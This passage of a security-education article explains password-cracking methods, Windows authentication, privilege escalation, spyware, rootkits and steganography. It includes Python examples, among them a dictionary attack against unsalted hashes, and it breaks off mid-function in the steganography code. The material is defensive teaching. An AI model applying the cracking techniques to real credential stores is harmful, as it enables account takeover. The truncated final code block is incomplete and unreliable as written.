Attackers do not need any technical knowledge or tools to perform these attacks. Examples include:

  • Shoulder Surfing
  • Social Engineering
  • Dumpster Diving

Active Online Attacks

Attackers perform password cracking by directly communicating with the victim machine.

  • Dictionary attack: The dictionary attack, as its name suggests, is a method that uses an index of words that feature most commonly as user passwords. This is a slightly less-sophisticated version of the brute force attack but it still relies on hackers bombarding a system with guesses until something sticks.
  • Brute force attack: Similar in function to the dictionary attack, the brute force attack is regarded as being a little more sophisticated. Rather than using a list of words, brute force attacks are able to detect non-dictionary terms, such as alpha-numeric combinations. This means passwords that include strings such as “aaa1” or “zzz10” could be at risk from a brute force attack.
  • Hash Injection: A pass the hash attack is an exploit in which an attacker steals a hashed user credential and, without cracking it, reuses it to trick an authentication system into creating a new authenticated session on the same network.
  • Phishing: There is an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a fake login page associated with whatever service the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go and use it for their own purposes.
  • Malware: A keylogger, or screen scraper, can be installed by malware which records everything users type or takes screenshots during a login process, and then forwards a copy of this file to hacker central.
  • Password Guessing: The password cracker’s best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user-generated ‘random’ password is unlikely to be anything of the sort. Instead, thanks to our brains’ emotional attachment to things we like, the chances are those random passwords are based upon our interests, hobbies, pets, family and so on. In fact, passwords tend to be based on all the things we like to chat about on social networks and even include in our profiles.

Passive Online Attacks

Attackers perform password cracking without communicating with the authorizing party.

  • Wire Sniffing: Sniffing attack or a sniffer attack, in context of network security, corresponds to theft or interception of data by capturing the network traffic using a sniffer (an application aimed at capturing network packets). When data is transmitted across networks, if the data packets are not encrypted, the data within the network packet can be read using a sniffer. Using a sniffer application, an attacker can analyze the network and gain information to eventually cause the network to crash or to become corrupted, or read the communications happening across the network.
  • Man-in-the-Middle: A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within the reception range of an unencrypted wireless access point (Wi-Fi) could insert themselves as a man-in-the-middle.
  • Replay Attack: A replay attack (also known as playback attack) is a form of network attack in which valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and re-transmits it, possibly as part of a masquerade attack by IP packet substitution. This is one of the lower-tier versions of a Man-in-the-middle attack.

Default Password

As mentioned before, a default password is supplied by the manufacturer with new equipment (e.g. switches, hubs, routers) that is password protected. Attackers can easily find lists with compilations of these passwords and use them to access a system.

Offline Attack

The attacker copies the target’s password file and then tries to crack the passwords on their own system at a different location.

  • Pre-Computed Hashes and Rainbow Tables: Rainbow tables might sound innocuous, but they are in fact incredibly useful tools in a hacker’s arsenal. When passwords are stored on a computer system, they are hashed – the one-way nature of this process means that the password cannot be recovered directly from its hash. Simply put, rainbow tables function as a pre-computed database of passwords and their corresponding hash values, which is then used as an index to cross-reference hashes found on a computer with those already pre-computed in the rainbow table. Compared to a brute force attack, which does most of the computation during the operation, rainbow tables boil the attack down to just a search through a table.
  • Distributed Network: A Distributed Network Attack (DNA) technique is used for recovering passwords from hashes or password-protected files using the unused processing power of machines across the network to decrypt passwords. The DNA Manager is installed in a central location where machines running on DNA Client can access it over the network. DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network. DNA Client runs in the background, consuming only unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password.

USB Drive

For this attack, the attacker needs physical access to the target machine. The attacker will insert a USB drive previously prepared with a password cracker tool and an autorun mechanism on the targeted computer. Once the device is connected the tool will try to crack the password.

Authentication mechanisms

In computer environments, authentication is the verification process that identifies a user or device and proves that it has legitimate access rights to resources. This prevents impostors from using or accessing resources they should not be allowed to, by ensuring the authenticity of users, computers and services.

The Microsoft platform implements multiple authentication protocols, among which we can find:

  • Kerberos
  • Security Account Manager (SAM)
  • NT LAN Manager (NTLM)

Kerberos

Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. The Kerberos protocol uses strong cryptography so that a client can prove its identity to a server (and vice versa) across an insecure network connection. After a client and server have used Kerberos to prove their identity, they can also encrypt all of their communications to assure privacy and data integrity as they go about their business.

Here are the most basic steps taken to authenticate in a Kerberized environment.

  1. Client requests an authentication ticket (TGT) from the Key Distribution Center (KDC).
  2. The KDC verifies the credentials and sends back an encrypted TGT and session key.
  3. The TGT is encrypted using the Ticket Granting Service (TGS) secret key.
  4. The client stores the TGT and when it expires the local session manager will request another TGT (this process is transparent to the user).

If the Client is requesting access to a service or other resource on the network, this is the process:

  1. The client sends the current TGT to the TGS with the Service Principal Name (SPN) of the resource the client wants to access.
  2. The KDC verifies the TGT of the user and that the user has access to the service.
  3. TGS sends a valid session key for the service to the client.
  4. Client forwards the session key to the service to prove the user has access, and the service grants access.

Security Account Manager (SAM)

Windows stores and manages the local user and group accounts in a database file called Security Account Manager (SAM). It authenticates local user logons. On a domain controller, it simply stores the administrator account from the time it was a server, which serves as the Directory Services Restore Mode (DSRM) recovery account.

In the SAM, each user account can be assigned a local area network (LAN) password and a Windows password. Both are encrypted. If someone attempts to log on to the system and the user name and associated passwords match an entry in the SAM, a sequence of events takes place ultimately allowing that person access to the system. If the user name or passwords do not properly match any entry in the SAM, an error message is returned requesting that the information be entered again.

In personal computers (PCs) not connected into a LAN and for which there is only one user, Windows asks for only one password when the system is booted up. This function can be disabled if the user does not want to enter authentication data every time the computer is switched on or restarted. The main purpose of the SAM in a PC environment is to make it difficult for a thief to access the data on a stolen machine. It can also provide some measure of security against online hackers.

The user passwords are stored in hashed format in a registry hive, either as an LM hash or as an NTLM hash. Windows XP and later versions do not store the LM hash value or, if the password exceeds fourteen characters, store a blank or dummy value instead. This file can be found at '%SystemRoot%\system32\config\SAM' and is mounted at 'HKLM\SAM'. The information is stored in the following format:

username:userId:LMHash:NTLMHash:::
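A small parser for that record layout, together with the check a defender runs over it, is shown below. This is an added example for this post, not code from the original article. The sample records are constructed and their 32-digit hex values are not real hashes; the two constants are the well-known LM and NT hashes of the empty password, so an LM field that differs from its constant means a legacy LM hash is still being stored.

```python
"""Added example (not from the original post): parse password records in the
username:userId:LMHash:NTLMHash::: layout shown above and flag weak storage.
The sample lines are constructed; their hex values are not real hashes."""
from dataclasses import dataclass
from typing import Dict, List

# Well-known hash values of the empty password. An LM field equal to this value
# (or left empty) means no LM hash is stored for the account, which is desirable.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample records in the layout from the post.
SAMPLE_RECORDS = """\
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass
class SamRecord:
    username: str
    user_id: int
    lm_hash: str
    nt_hash: str


def parse_sam_line(line: str) -> SamRecord:
    """Split one record on ':'; the trailing empty fields are ignored."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"malformed record: {line!r}")
    return SamRecord(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower())


def parse_sam_dump(text: str) -> List[SamRecord]:
    """Parse a whole dump, skipping blank lines."""
    return [parse_sam_line(line) for line in text.splitlines() if line.strip()]


def audit_records(records: List[SamRecord]) -> Dict[str, List[str]]:
    """Return findings per account: a hash field that is not 32 hex digits
    (truncated or corrupt dump), an LM hash still stored, or an empty password."""
    findings: Dict[str, List[str]] = {}
    hexdigits = set("0123456789abcdef")
    for rec in records:
        issues: List[str] = []
        for label, value in (("LM", rec.lm_hash), ("NT", rec.nt_hash)):
            if value and (len(value) != 32 or not set(value) <= hexdigits):
                issues.append(f"{label} hash field is not 32 hex digits")
        if rec.lm_hash not in ("", EMPTY_LM_HASH):
            issues.append("LM hash stored (legacy format, easily cracked; disable LM hash storage)")
        if rec.nt_hash == EMPTY_NT_HASH:
            issues.append("empty password")
        if issues:
            findings[rec.username] = issues
    return findings
```

Run `audit_records(parse_sam_dump(SAMPLE_RECORDS))` to get the per-account findings; on the constructed sample, `bob` is flagged for a stored LM hash and `guest` for an empty password, while `alice` is clean.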

NT LAN Manager (NTLM)

NT (New Technology) LAN Manager (NTLM) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users.

NTLM is a challenge-response authentication protocol which uses three messages to authenticate a client in a connection-oriented environment (connectionless is similar), and a fourth additional message if integrity is desired.

  1. First, the client establishes a network path to the server and sends a 'NEGOTIATE_MESSAGE' advertising its capabilities.
  2. Next, the server responds with a 'CHALLENGE_MESSAGE' which is used to establish the identity of the client.
  3. Finally, the client responds to the challenge with an 'AUTHENTICATE_MESSAGE'.
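The exchange in those three steps, modelled in code as an added example for this post (it is not Microsoft's implementation): the server stores a verifier derived from the password, issues a random challenge, and checks a keyed MAC over it. The derivation here (SHA-256 of the UTF-16LE password, HMAC-SHA256 for the response) is an assumption made to keep the demo in the standard library; real NTLM uses MD4 for the hash and binds further fields into the response. The single-use challenge set shows why a captured response cannot simply be replayed.

```python
"""Added example (not from the original post): the three-message challenge/
response exchange described above, modelled with HMAC-SHA256. Real NTLM derives
its hash with MD4 over the UTF-16LE password and binds more fields into the
response; the simpler derivation here is an assumption made for the demo."""
import hashlib
import hmac
import secrets
from typing import Dict, Set, Tuple


def password_verifier(password: str) -> bytes:
    """What the server stores instead of the password (assumption: SHA-256 of
    the UTF-16LE password; NTLM uses MD4 at this point)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def client_response(verifier: bytes, challenge: bytes) -> bytes:
    """AUTHENTICATE_MESSAGE payload: a MAC over the server's challenge keyed with
    the verifier. The password itself never crosses the wire."""
    return hmac.new(verifier, challenge, hashlib.sha256).digest()


class AuthServer:
    def __init__(self, verifiers: Dict[str, bytes]):
        self._verifiers = verifiers
        self._pending: Set[bytes] = set()  # challenges issued but not yet answered

    def challenge(self) -> bytes:
        """CHALLENGE_MESSAGE: a fresh random nonce, remembered so it is single-use."""
        nonce = secrets.token_bytes(8)
        self._pending.add(nonce)
        return nonce

    def authenticate(self, username: str, challenge: bytes, response: bytes) -> bool:
        """Verify AUTHENTICATE_MESSAGE. A challenge that was never issued, or was
        already consumed, is rejected; that is what defeats a replayed response."""
        if challenge not in self._pending:
            return False
        self._pending.discard(challenge)
        # Unknown users get a dummy verifier so the MAC is always computed and
        # timing does not reveal which usernames exist.
        verifier = self._verifiers.get(username, b"\0" * 32)
        valid = hmac.compare_digest(client_response(verifier, challenge), response)
        return valid and username in self._verifiers


def handshake(server: AuthServer, username: str, password: str) -> Tuple[bool, bytes, bytes]:
    """NEGOTIATE -> CHALLENGE -> AUTHENTICATE. Returns the outcome plus the two
    values an eavesdropper would observe on the wire."""
    challenge = server.challenge()  # the client's NEGOTIATE_MESSAGE is implicit here
    response = client_response(password_verifier(password), challenge)
    return server.authenticate(username, challenge, response), challenge, response
```

Note what the model makes explicit: the response is a function of the stored verifier, not of the password, so anyone holding the verifier can answer a challenge without ever knowing the password. That is the pass-the-hash weakness listed under active online attacks above, and the reason the hash store has to be protected as carefully as a plaintext password would be.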

The NTLM authentication process can be observed in the image below.

NTLM Authentication

Before Kerberos, Microsoft used NTLM technology. The biggest difference between the two systems is the third-party verification and stronger encryption capability in Kerberos. This extra step in the process provides a significant additional layer of security over NTLM.

Protecting Passwords

When passwords are stored, they should not be stored as plain text. To avoid this, there are a few techniques that can be used:

  • Encryption: Encryption is the practice of scrambling information in a way that only someone with the corresponding key can unscramble and read it. Encryption is a two-way function. When users encrypt something, they do so with the intention of decrypting it later. To encrypt data, an algorithm is used – a series of well-defined steps that can be followed procedurally – to encrypt and decrypt the information.
  • Hashing: Hashing is the practice of using an algorithm to map data of any size to a fixed length. This is called a hash value. Whereas encryption is a two-way function, hashing is a one-way function. While it is technically possible to reverse-hash something, the computing power required makes it unfeasible.
  • Salting: Salting is a concept that typically pertains to password hashing. Essentially, it is a unique value that can be added to the end of the password to create a different hash value. This adds a layer of security to the hashing process, specifically against brute force attacks.

Despite all these techniques, hashes can be cracked or, at least, there are a few techniques that can try to crack a hash.

  • Dictionary and Brute Force Attacks: The simplest way to crack a hash is to try to guess the password, hashing each guess, and checking if the guess’s hash equals the hash being cracked. If the hashes are equal, the guess is the password. The two most common ways of guessing passwords are dictionary attacks and brute-force attacks.
  • Lookup Table: Lookup tables are an extremely effective method for cracking many hashes of the same type very quickly. The general idea is to pre-compute the hashes of the passwords in a password dictionary and store them, and their corresponding password, in a lookup table data structure. A good implementation of a lookup table can process hundreds of hash lookups per second, even when they contain many billions of hashes.
  • Reverse Lookup Tables: This attack allows an attacker to apply a dictionary or brute-force attack to many hashes at the same time, without having to pre-compute a lookup table. First, the attacker creates a lookup table that maps each password hash from the compromised user account database to a list of users who had that hash. The attacker then hashes each password guess and uses the lookup table to get a list of users whose password was the attacker’s guess. This attack is especially effective because it is common for many users to have the same password.
  • Rainbow Tables: Already covered above, but rainbow tables are a time-memory trade-off technique. They are like lookup tables, except that they sacrifice hash cracking speed to make the lookup tables smaller. Because they are smaller, the solutions to more hashes can be stored in the same amount of space, making them more effective. Rainbow tables that can crack any MD5 hash of a password up to 8 characters long exist.
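The reverse lookup table attack and the salting countermeasure from the two lists above fit in one short piece of code. This is an added example for this post, not code from the original article; it uses plain SHA-256 and a constructed five-word dictionary and user database. It counts hash operations so that the effect of salting on cost is visible: unsalted, each guess is hashed once for the whole database; salted, each guess has to be re-hashed for every user.

```python
"""Added example (not from the original post): a reverse lookup table attack on
unsalted hashes beside the salted scheme that breaks it. Uses plain SHA-256;
the user database and dictionary are constructed for the demo."""
import hashlib
import secrets
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed dictionary; "password" is deliberately last so the per-user cost shows.
DICTIONARY: List[str] = ["123456", "qwerty", "letmein", "dragon", "password"]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def crack_unsalted(user_hashes: Dict[str, str], dictionary: List[str]) -> Tuple[Dict[str, str], int]:
    """Reverse lookup table: index the leaked hashes by value, then hash each
    dictionary word once and look it up. Returns (user -> password, hash count).
    Every user sharing a password falls at the same time."""
    by_hash: Dict[str, List[str]] = defaultdict(list)
    for user, digest in user_hashes.items():
        by_hash[digest].append(user)
    found: Dict[str, str] = {}
    hash_ops = 0
    for guess in dictionary:
        hash_ops += 1
        for user in by_hash.get(sha256_hex(guess.encode()), []):
            found[user] = guess
    return found, hash_ops


def salted_hash(password: str, salt: bytes) -> str:
    """Hash of salt || password; a different salt gives a different digest."""
    return sha256_hex(salt + password.encode())


def make_salted_db(plain: Dict[str, str]) -> Dict[str, Tuple[bytes, str]]:
    """Store (salt, hash) per user with a fresh random 16-byte salt for each."""
    db: Dict[str, Tuple[bytes, str]] = {}
    for user, password in plain.items():
        salt = secrets.token_bytes(16)
        db[user] = (salt, salted_hash(password, salt))
    return db


def crack_salted(db: Dict[str, Tuple[bytes, str]], dictionary: List[str]) -> Tuple[Dict[str, str], int]:
    """With per-user salts no table can be shared across users: each guess must
    be re-hashed per user, so the cost scales with users * dictionary size."""
    found: Dict[str, str] = {}
    hash_ops = 0
    for user, (salt, digest) in db.items():
        for guess in dictionary:
            hash_ops += 1
            if salted_hash(guess, salt) == digest:
                found[user] = guess
                break
    return found, hash_ops
```

On the constructed data, `crack_unsalted` recovers three of four users with five hash operations in total; the same two users with salted storage cost ten operations, and their identical passwords no longer produce identical hashes. Salting alone only removes the shared-table shortcut; production systems also replace the fast hash with a deliberately slow, memory-hard function (bcrypt, scrypt, Argon2 or PBKDF2) so that each of those per-user guesses is expensive.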

Password Cracking Tools

There are a plethora of password cracking tools out there. A few of them are:

  • John the Ripper
  • Hashcat
  • THC Hydra
  • Medusa
  • Ophcrack

Escalating Privileges

Privilege escalation happens when a malicious user exploits a bug, design flaw, or configuration error in an application or operating system to gain elevated access to resources that should normally be unavailable to that user. The attacker can then use the newly gained privileges to steal confidential data, run administrative commands or deploy malware – and potentially do serious damage to a target operating system, server applications, organization, and reputation.

Attackers start by exploiting a privilege escalation vulnerability in a target system or application, which lets them override the limitations of the current user account. They can then access the functionality and data of another user (horizontal privilege escalation) or obtain elevated privileges, typically of a system administrator or other power user (vertical privilege escalation). Such privilege escalation is generally just one of the steps performed in preparation for the main attack.

While usually not the main aim of an attacker, privilege escalation is frequently used in preparation for a more specific attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever users detect or suspect privilege escalation, they also need to look for signs of other malicious activity. However, even without evidence of further attacks, any privilege escalation incident is an information security issue in itself, because someone could have gained unauthorized access to personal, confidential or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.

To make matters worse, it can be hard to distinguish between routine and malicious activity in order to detect privilege escalation incidents. This is especially true for rogue users, who might use their legitimate access to perform malicious actions that compromise security. However, if security personnel can quickly detect successful or attempted privilege escalation, they have a good chance of stopping an attack before the intruders can establish a foothold to launch their main attack.

Horizontal Privilege Escalation

With horizontal privilege escalation, attackers remain on the same general user privilege level but can access data or functionality of other accounts or processes that should be unavailable to the current account or process. For example, this may mean using a compromised office workstation to gain access to other office users’ data. For web applications, one example of horizontal privilege escalation might be getting access to another user’s profile on a social site or e-commerce platform, or their bank account on an e-banking site.

Vertical Privilege Escalation

With vertical privilege escalation (also called privilege elevation), attackers start from a less privileged account and obtain the rights of a more powerful user – typically the administrator or system user on Microsoft Windows, or root on Unix and Linux systems. With these elevated privileges, the attacker can wreak all sorts of havoc on computer systems and applications: steal access credentials and other sensitive information, download and execute malware, erase data, or execute arbitrary code. Worse still, skilled attackers can use elevated privileges to cover their tracks by deleting access logs and other evidence of their activity. This can potentially leave the victim unaware that an attack took place at all. That way, cybercriminals can covertly steal information or plant malware directly in company systems.

When Escalation Succeeds

Once attackers have gained unauthorised access to a system and escalated privileges, their next step is to execute malicious applications on the target system to “own” it. The attackers’ goals are:

  • Installation of malware to collect information: To do this, tools like 'RemoteExec' or 'PDQ Deploy' can be used.
  • To set up a backdoor to maintain access.
  • To crack existing passwords.
  • To install keyloggers for monitoring or capturing user actions: If the access has been physical, it can be a hardware keylogger attached to the physical machine; otherwise, it can be a software keylogger.

Protecting from Privilege Escalation

Attackers can use many privilege escalation techniques to achieve their goals. But to attempt privilege escalation in the first place, they usually need to gain access to a less privileged user account. Possible protection measures are:

  • Enforce password policies.
  • Create specialized users and groups with minimum necessary privileges and file access.
  • Avoid common programming errors in applications.
  • Secure databases and sanitize user input.
  • Keep systems and applications patched and updated.
  • Ensure correct permissions for all files and directories.
  • Close unnecessary ports and remove the unused user accounts.
  • Remove or tightly restrict all file transfer functionality.
  • Change default credentials on all devices, including routers and printers.
  • Regularly scan systems and applications for vulnerabilities.
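Two items in that list, correct permissions on files and directories and the principle of least privilege, are the kind of thing worth checking automatically. The following is an added example for this post, not code from the original article: a permission audit that walks a directory tree and reports world-writable entries and setuid/setgid executables, the classic starting points for local privilege escalation. It builds its own sample tree in a temporary directory, so the paths it reports are constructed; run it against a real tree by passing that path to `audit_permissions`.

```python
"""Added example (not from the original post): a permission audit for the
'correct permissions for all files and directories' measure above. Walks a
tree and reports world-writable entries and setuid/setgid executables; the
sample tree it checks is constructed in a temporary directory."""
import os
import stat
import tempfile
from typing import Dict, List


def audit_permissions(root: str) -> Dict[str, List[str]]:
    """Return paths (relative to root) in three buckets. Symlinks are skipped so a
    link into another tree is not reported as if it lived here. World-writable
    directories that carry the sticky bit (like /tmp) are not flagged, because
    the sticky bit stops users from deleting or renaming each other's files."""
    findings: Dict[str, List[str]] = {"world_writable": [], "setuid": [], "setgid": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(path, root)
            sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
            if mode & stat.S_IWOTH and not sticky_dir:
                findings["world_writable"].append(rel)
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                findings["setuid"].append(rel)
            if stat.S_ISREG(mode) and mode & stat.S_ISGID:
                findings["setgid"].append(rel)
    for bucket in findings.values():
        bucket.sort()
    return findings


def build_demo_tree() -> str:
    """Constructed sample tree: a sane file, a world-writable file, a setuid
    executable, and a sticky world-writable directory that must not be flagged."""
    root = tempfile.mkdtemp(prefix="permaudit-")

    def touch(rel: str, mode: int) -> None:
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # explicit chmod, so the umask does not interfere

    touch("report.txt", 0o644)
    touch("shared.log", 0o666)
    touch("helper", 0o4755)
    os.mkdir(os.path.join(root, "scratch"))
    os.chmod(os.path.join(root, "scratch"), 0o1777)
    return root


if __name__ == "__main__":
    for bucket, paths in audit_permissions(build_demo_tree()).items():
        print(f"{bucket}: {paths}")
```

The audit is deliberately conservative: it reports only what the mode bits say and leaves the decision of whether a given setuid binary is legitimate to the reviewer. On a real host the interesting input is the whole filesystem with a baseline to diff against, so that a newly appeared setuid file stands out.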

Spyware

Spyware is unwanted software that infiltrates computing devices, stealing internet usage data and sensitive information. Spyware is classified as a type of malware – malicious software designed to gain access to or damage computers, often without the owners’ knowledge. Spyware gathers personal information and relays it to advertisers, data firms, or external users.

Spyware is used for many purposes. Usually, it aims to track and sell users’ internet usage data, capture credit card or bank account information, or steal personal identities by monitoring internet activity, tracking login and password information, and spying on sensitive information.

The most common types of spyware are:

  • Adware: This type of spyware tracks browser history and downloads, with the intent of predicting what products or services users are interested in. The adware will display advertisements for the same or related products or services to entice users to click or make a purchase. Adware is used for marketing purposes and can slow down computers.
  • System monitors: This type of spyware can capture just about everything users do on their computers. System monitors can record all keystrokes, emails, chat-room dialogues, websites visited, and programs run. System monitors are often disguised as freeware.
  • Tracking cookies: These track the user’s web activities, such as searches, history, and downloads, for marketing purposes.
  • Trojans: This kind of malicious software disguises itself as legitimate software. For example, Trojans may appear to be a Java or Flash Player update upon download. Trojan malware is controlled by third parties. It can be used to access sensitive information such as Social Security numbers and credit card information.

Some of the spyware features are:

  • Tracking users
  • Monitoring the user’s activity
  • Record conversations
  • Blocking applications and services
  • Remote delivery of logs
  • Email communication tracking
  • Recording removable media communications
  • Voice recording
  • Video recording
  • Tracking location

Rootkits

A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection between the two words “root” and “kit“. Originally, a rootkit was a collection of tools that enabled administrator-level access to a computer or network. Root refers to the Admin account on Unix and Linux systems, and kit refers to the software components that implement the tool. Today rootkits are generally associated with malware – such as Trojans, worms, viruses – that conceal their existence and actions from users and other system processes.

A rootkit allows someone to maintain command and control over a computer without the computer user/owner knowing about it. Once a rootkit has been installed, the controller of the rootkit has the ability to remotely execute files and change system configurations on the host machine. A rootkit on an infected computer can also access log files and spy on the legitimate computer owner’s usage.

The different types of rootkits can be classified in the categories below.

  • Hardware or firmware rootkit: The name of this type of rootkit comes from where it is installed on a computer. This type of malware could infect a computer’s hard drive or its system BIOS, the software that is installed on a small memory chip in the computer’s motherboard. It can even infect routers. Hackers can use these rootkits to intercept data written on the disk.
  • Bootloader rootkit: The computer’s bootloader is an important tool. It loads the computer’s operating system when the machine is turned on. A bootloader rootkit, then, attacks this system, replacing the computer’s legitimate bootloader with a hacked one. This means that this rootkit is activated even before the computer’s operating system starts.
  • Memory rootkit: This type of rootkit hides in a computer’s Random Access Memory (RAM). These rootkits will carry out harmful activities in the background. These rootkits have a short lifespan. They only live in the computer’s RAM and will disappear once the system reboots – though sometimes further work is required to get rid of them.
  • Application rootkit: Application rootkits replace standard files in a computer with rootkit files. They might also change the way standard applications work. These rootkits might infect programs such as Word, Paint, or Notepad. Every time users run these programs, they will give hackers access to their computer. The challenge here is that the infected programs will still run normally, making it difficult for users to detect the rootkit.
  • Kernel-mode rootkits: These rootkits target the core of a computer’s operating system. Cybercriminals can use these to change how an operating system functions. They just need to add their own code to it. This can give them easy access to a computer and make it easy for them to steal personal information.

Detecting and Defending Rootkits

Because rootkits are so dangerous and so difficult to detect, it is important to exercise caution when surfing the internet or downloading programs. There is no way to magically protect systems from all rootkits. It is difficult to detect rootkits. There are no commercial products available that can find and remove all known and unknown rootkits. There are various ways to look for a rootkit on an infected machine. Detection methods include behavioural-based methods (e.g., looking for strange behaviour on a computer system), signature scanning and memory dump analysis. Often, the only option to remove a rootkit is to completely rebuild the compromised system.

Fortunately, the odds of avoiding these attacks can be increased by following the same common-sense strategies usually taken to avoid any computer virus, including these:

  • Do not ignore updates: Updating a computer’s applications and operating system can be annoying, especially when it seems as if there is a new update to approve every time it is turned on. But they should not be ignored. Keeping operating systems, antivirus software, and other applications updated is the best way to protect against rootkits.
  • Watch out for phishing emails: Phishing emails are sent by scammers who want to trick users into providing them with financial information or downloading malicious software, such as rootkits, onto computers.
  • Be careful of drive-by downloads: Drive-by downloads can be especially troublesome. These happen when users visit a website and it automatically installs malware on their computer. They do not have to click on anything or download anything from the site for this to happen. And it is not just suspicious websites that can cause this. Hackers can embed malicious code in legitimate sites to cause these automatic downloads.
  • Do not download files sent by unknown people: Users need to be careful, too, when opening attachments. They should not open attachments sent by unknown people. Doing so could cause a rootkit to be installed on their computer.

Steganography

Steganography is the practice of sending data in a concealed format so the very fact of sending the data is disguised. The word steganography is a combination of the Greek words στεγανός (steganos), meaning “covered, concealed, or protected”, and γράφειν (graphein) meaning “writing”.

Unlike cryptography, which conceals the contents of a secret message, steganography conceals the very fact that a message is communicated. The concept of steganography was first introduced in 1499, but the idea itself has existed since ancient times. There are stories of a method being used in the Roman Empire whereby a slave chosen to convey a secret message had his scalp shaved clean and a message was tattooed onto the skin. When the messenger’s hair grew back, he was dispatched on his mission. The receiver shaved the messenger’s scalp again and read the message.

Classifications

Steganography is classified into two types, Technical and Linguistic. Technical includes concealing information using methods like invisible ink, microdots, and other methods to hide information. Linguistic uses the text as covering media to hide the information like cyphers and codes.

Types

Classified by the cover medium, the main types of steganography are:

  • Text steganography: the information is hidden in the formatting of a text, such as the number of tabs or white spaces, the use of capital letters or line lengths, much as Morse code encodes information in dots and dashes.
  • Image steganography: the cover object is an image and the information is hidden in the pixel intensities. 8-bit (palette) and 24-bit images are the common covers; the larger the image, the more data it can hold, although large stego images may need to be compressed to avoid drawing attention. The usual techniques are LSB insertion and masking and filtering.
  • Network steganography: the carrier is a network protocol (TCP, UDP, IP, etc.). In the TCP/IP stack the covert channels are typically unused or reserved header bits and, in timing channels, the spacing between packets.
  • Audio steganography: the carrier is audio, a medium that matters increasingly because of the popularity of voice over IP (VoIP). Digital formats such as WAVE, MIDI and MPEG audio are used, with methods such as LSB coding, echo hiding, parity coding and phase coding.
  • Video steganography: any kind of file or information is hidden in a digital video. Since a video is a sequence of images, the image techniques apply to each frame; in compressed formats the discrete cosine transform (DCT) coefficients are altered slightly, e.g. rounding 8.667 to 9, in a way the human eye does not notice. Formats such as H.264, MP4, MPEG or AVI are used.

Steganalysis

Steganalysis is the discovery of hidden information: what cryptanalysis is to cryptography, steganalysis is to steganography. Its goal is to detect hidden information and to break the security of its carriers; in practice it is the attack of steganography methods in order to detect, extract, destroy or manipulate the hidden data in a stego object.

Attacks can be of several types: some merely detect the presence of hidden data; some detect and extract it; some only destroy it once its existence is known, without trying to extract it; and some replace the hidden data with other data after finding the exact location where it is hidden.

Detection alone is enough to foil the purpose of steganography even if the secret message is never extracted, because once hidden data is known to exist it can be destroyed. Detection is generally carried out by identifying some characteristic feature of the image that is altered by the embedding. A good steganalyst must know the methods and techniques of the steganography tools in order to attack them efficiently.

Classification of attacks based on information available to the attacker:

  • Stego only attack: only the stego object is available for analysis.
  • Known cover attack: both the cover and the stego object are known.
  • Known message attack: in some cases the message is known, and analysing the pattern the embedded message produces in the stego object may help to attack similar systems.
  • Chosen stego attack: the steganographic algorithm and the stego object are known.
  • Chosen message attack: the steganalyst creates sample stego objects with many steganographic tools for a chosen message, compares them with the suspected object and tries to find the algorithm used.
  • Known stego attack: the cover object and the steganographic tool used are known.

Steganalysis approaches

  • Visual attacks: the image is inspected by eye, for example by extracting single bit planes (the LSB plane in particular) and looking for visible differences or patterns in them.
  • Structural attacks: the format of the data file often changes as the data is embedded, and identifying these characteristic structural changes reveals the hidden data. For example, in palette-based steganography the palette is changed before embedding to reduce the number of colours, so that adjacent palette entries differ very little; groups of near-identical colours in a palette are not found in normal images.
  • Statistical attacks: the image is analysed with mathematical formulas and the hidden data is detected from the resulting statistics. Generally the hidden message is more random than the original image data, so a formula that measures this randomness reveals the existence of the data; the chi-square and pairs-of-values tests are the classic examples.
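The following is an added example, not code from the article, showing both sides described above: LSB insertion into the pixel bytes of an image (with a length header so the receiver knows where the payload ends) and the pairs-of-values statistical attack against it. The cover is a constructed array of pixel bytes rather than a real image file; its 85 % even values exaggerate the structure of a real image so the statistic is easy to see, and the secret text is made up. Everything else is plain Python.

```python
"""LSB image steganography plus a pairs-of-values steganalysis statistic."""
import random
import struct

HEADER = 4  # bytes of length prefix written before the payload


def lsb_embed(cover: bytes, message: bytes) -> bytes:
    """Hide `message` in the least significant bit of consecutive cover bytes.

    A 4-byte big-endian length header goes first so the extractor knows where
    the payload ends. Each payload byte consumes 8 cover bytes (pixels).
    """
    payload = struct.pack(">I", len(message)) + message
    if len(payload) * 8 > len(cover):
        raise ValueError("cover too small for payload")
    stego = bytearray(cover)
    pos = 0
    for byte in payload:
        for shift in range(7, -1, -1):            # MSB first
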